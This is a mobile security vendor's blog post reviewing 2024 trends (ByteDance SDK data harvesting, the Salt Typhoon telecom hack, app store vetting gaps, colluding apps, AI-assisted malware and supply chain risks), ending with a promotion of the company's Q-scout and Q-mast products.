For teams responsible for mobile security and applications, 2024 marked a time of rapid, dramatic shifts. While securing mobile devices, users, and data has been an ongoing challenge, the past year has seen this task grow even more difficult.
In this post, we’ll highlight some key stories that emerged in 2024, and outline what these trends will mean in the year ahead.
Story #1. ByteDance code appeared everywhere—and a TikTok ban won’t change that in 2025
Over the course of 2024, TikTok and its parent company, ByteDance, were in the news constantly. However, the risks posed go back much further. Back when our company was known as Kryptowire, we were following TikTok and were one of the first security vendors to alert people to the risks it posed.
TikTok is an example of what we’ve termed “harvester apps.” TikTok is one of many such apps that harvest a range of user data and use it in some fashion. One of the problematic aspects of TikTok is that it features a library that enables this harvesting, typically without a users’ knowledge, let alone consent.
While TikTok is indeed a problem, it’s the tip of the iceberg. Through software development kits, or SDKs, ByteDance enables app developers to re-use snippets of code—and this code, along with TikTok and other ByteDance apps, has seen massive adoption around the globe. Across industries more generally, app developers just want to get new apps and features out to the app stores quickly, and they’re growing increasingly reliant upon third-party code to facilitate these efforts. In the case of ByteDance, teams also want to facilitate integration with TikTok, which is another reason the SDKs are used so broadly.
At Quokka, we did an extensive analysis of about 10,000 mobile apps. We found that thousands of apps have problematic ByteDance libraries—and these apps have accounted for more than three billion downloads. While these libraries predominantly appear in gaming apps, they also appear in a range of other app categories as well, including social media apps and tools. (For more information on the threats posed by ByteDance code, see our prior post, “The security risks inherent in the TikTok app—and why a ban won’t solve the problem.”)
Quite simply, TikTok and ByteDance code presents significant risks, and those risks won’t disappear regardless, whether or not a TikTok ban gets imposed in 2025.
Story #2. Salt Typhoon underscored the massive scale of exposure to mobile threats
At least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign known as Salt Typhoon. As of the middle of December, the hack was still reported to be active, exposing the metadata of more than one million users so far.
What’s perhaps most disturbing is that through this hack, attackers were able to effectively tap the wireless voice and data transmissions that were sent between mobile devices and backend telecommunications infrastructure. To counter this threat, users are being encouraged to use apps that send encrypted transmissions, such as Signal and WhatsApp. While that can help secure voice and text communications, that is only part of the problem.
What about all the other transmissions our mobile apps perform on a constant basis? Banking apps, gaming apps, productivity apps, dating apps – all these apps send and receive data constantly.
When we’re browsing on our laptops, we’ve been trained to look for the padlock icon when accessing a web site. The problem is there’s not the equivalent for all the mobile apps we’re using. As users, we have no way of knowing if the app vendor is encrypting data transmissions or even whether they’re employing security measures of any kind. Nor can we easily tell if an app is intentionally or unintentionally sharing or otherwise misusing our data. Pretty much any app that can access device functionality or data can potentially transmit unencrypted data, and expose sensitive assets.
This hack has really opened the eyes of many, clearly illustrating that telecommunications firms, and organizations more generally, are underinvested in mobile security.
Story #3. App store policing continued to be ineffective in protecting users
When it comes to accessing mobile apps, the app stores of Apple and Google have pretty much been the only game in town for iOS and Android devices, respectively. These companies take a cut of around 30% from app sales on their stores, making billions of dollars in the process.
The app stores do provide some safeguards, but they’re far from foolproof. We may hear about malicious apps being detected and pulled, and that can make us feel better. For example, in the second quarter of 2024, Google took one million apps off the Android store, and 3% of all iOS apps were removed from the Apple store.
However, the reality is that every week we see problematic apps that make it onto the stores and get downloaded by hundreds of thousands, maybe even millions, of users. Too often, it is only after apps have been broadly downloaded that security risks are discovered, most often by third-party security firms and labs. Here are just a few examples:
- In May 2024, Microsoft discovered the “Dirty Stream” attack and notified the app stores about some of the affected apps. By that point, the apps had accumulated over 1 billion and 500 million installs.
- A vulnerability in a file manager app on Xiaomi Android devices was detected, but only after that app had accounted for more than one billion installs.
These examples and many others underscore how having just two major app stores hasn’t ameliorated mobile app risks. It seems safe to assume that having more app stores will multiply these risks—and that’s exactly what’s expected to happen.
The app store ecosystem is evolving. The Digital Markets Act took effect in the EU, which will compel Apple to allow alternative marketplaces to distribute iOS apps. In addition, there have been calls to break up Google and additional app stores are being introduced.
Story #4. Sloppy and colluding apps kept presenting risks
In addition to the harvester app category described earlier, there are a range of other problematic apps that continued to cause problems in 2024.
Sloppy apps
Sloppy apps continue to make into app stores—and on to user devices. These sloppy apps aren’t necessarily intentionally malicious. Often, the app’s developer may simply have missed the fact that some third-party code was risky. For example, as is the case with ByteDance SDKs, some third-party libraries may collect and transmit user data to an external site. Alternatively, developers may have missed some security vulnerabilities in their code. For example, we see apps that hard code user credentials within the software, so these sensitive details can easily be spotted and misappropriated.
Colluding apps
Over the course of 2024, the risks posed by colluding apps continued to be exposed. The problem is that apps don’t operate in isolation. While a given app may appear to be innocuous on its own, it may pose a significant risk by colluding with another app on a device. One app may be using the microphone to create recordings, while another app could send those recordings to some malicious actor.
Addressing this risk is only getting more difficult. In part, this is because the number and variety of apps on a given device tends to keep increasing. We’ve seen accounts of one device having 8,200 apps. To exploit these vulnerabilities, malicious actors could create anything, whether a pictures app, a note pad, or a specific business app, and encourage users to download them.
For more information on the range of risky apps in play today, see our blog post, “8 ways mobile apps jeopardize your business.”
Story #5. AI-powered app development added fuel to the fire
Developers continue to use AI to expedite and streamline the creation of new code. This has resulted in a flood of low-quality offerings hitting the app stores. The increasing use of AI poses numerous challenges.
Patterns being repeated
For better or worse, AI will replicate patterns. If one characteristic is used to inform an AI model, that characteristic will start to be a common trait that it keeps perpetuating. This can be good, that is, strong security practices could be repeated. However, it can often be bad: Traits like unknown security vulnerabilities and apps that employ poor security practices can also keep being replicated.
Bad guys started using AI too
It isn’t just legitimate app developers that are using AI. Malicious app developers, cyber criminals, and nation-states are using AI as well. As a result, AI isn’t just contributing to the delivery of sloppy apps; it’s fueling the creation and continued refinement of malware.
A key way malicious actors use AI is to obfuscate their code in order to evade existing security technologies. For example, many security mechanisms rely on establishing signatures of malicious code and using those signatures to identify and block subsequent use of that code. Malware developers are now leveraging AI to constantly tweak the code. While it may deliver the same core functionality, the modified code will look different enough to have a new signature generated, which means it would need to be identified and handled as a new threat in traditional security tools.
Story #6. Software supply chain attacks kept increasing—and getting harder to guard against
Back in 2023, the Cybersecurity and Infrastructure Security Agency (CISA) in the United States recommended that vendors who produce software also provide a software bill of materials (SBOM), which attests to the components that were used to create a given application. In this way, security teams and vendors can verify whether each component poses a threat. So, for example, if an application features a risky ByteDance library, teams can identify that in the SBOM and take steps to guard against the app’s usage or threats it poses. Now, government agencies like the Army and the Food and Drug Administration (FDA) are requiring SBOMs for every piece of software they use.
Beyond being able to inspect an SBOM, what’s key is that teams have the ability to effectively verify that the SBOM is correct and determine whether it features risky or malicious code. The proliferation of AI-generated code will continue to make this effort difficult. If a large language model (LLM) generated half of an app’s code, it may draw from a large number of different apps and libraries, some of which may be secure, others may be risky or downright malicious.
Whether it’s third-party, open-source code or AI-assisted code, the reality is that developers are doing less and less actual coding. It keeps getting harder to figure out where any given code snippet came from. How can teams build an accurate SBOM and definitively determine that the code is in fact secure?
Moving into 2025, we expect to see more attacks on software supply chains, and more vulnerabilities making it into software.
Key takeaways: What to be ready for in 2025
The stories that occurred in 2024 all share a common trait: They highlight problematic trends that show no signs of abating in 2025. Here are some key takeaways for security teams as they head into the new year:
- Quality of app intelligence will be critical. As we wrap up 2024 and head into the new year, one common complaint we’re hearing from security teams is that they’re drowning in noise. When teams are overloaded by noise, it tends to breed inaction or leave teams focusing on the wrong things. Teams must be able to leverage timely, targeted intelligence that provides actionable insights. Critically, they must be able to identify when apps exhibit signs of malicious behavior or intent. Finally, you can’t test these apps in isolation; you have to test the way apps interact with other apps and services in the device ecosystem.
- Scaling security will be critical. Key trends from 2024 underscore the accelerating, rapidly growing nature of mobile app development and threats. Around the world, teams are leveraging third-party and open-source code and AI. These techniques are dramatically accelerating app delivery. Unfortunately, these techniques don’t just speed the delivery of legitimate, secure apps, they also speed the production of problematic and malicious apps. Fundamentally, the more apps that become available and get downloaded onto devices, the more apps that teams have to test.
- Shortcomings of on-device security approaches will be increasingly exposed. Many mobile security technologies employ on-device protection mechanisms. Mobile device users, not to mention manufacturers like Apple and Google, don’t necessarily want some mechanism being installed on mobile devices that’s tracking all applications, all private information, browsing histories, and so on. Beyond the huge privacy concerns, these types of mechanisms can place a significant drain on a device’s battery and other resources. Fundamentally, these mechanisms aren’t equipped to scale to meet the pressing demands security teams face today.
Quokka can help
Heading into 2025, development and security organizations are contending with some daunting challenges. The good news is that Quokka is uniquely equipped to help.
Our Contextual Mobile Security Intelligence identifies malicious behaviors, colluding apps, privacy risks, and compliance gaps—providing precise, actionable insights to reduce risk and protect your organization. Our solutions don’t involve on-device testing and don’t require agents. That’s really the only way you can scale the testing of all the apps that may reside on a given user’s device, and all the ways those apps can interact with each other. Quokka offers these solutions:
- Q-scout. With behavior-driven detection, Q-scout identifies hidden threats, streamlines app vetting, and enables swift action to secure your mobile ecosystem—regardless of the operating system (OS).
- Q-mast. Q-mast embeds security into the app development lifecycle, conducting comprehensive testing to eliminate vulnerabilities and ensure secure apps are delivered on day one.
With Quokka, you’re equipped to tackle today’s challenges and stay ahead of tomorrow’s threats. Contact us today to learn more or schedule a demo. In addition, to learn more, you can view our webcast, “Top Mobile Security Stories & Trends of 2024 and 2025 Predictions.”
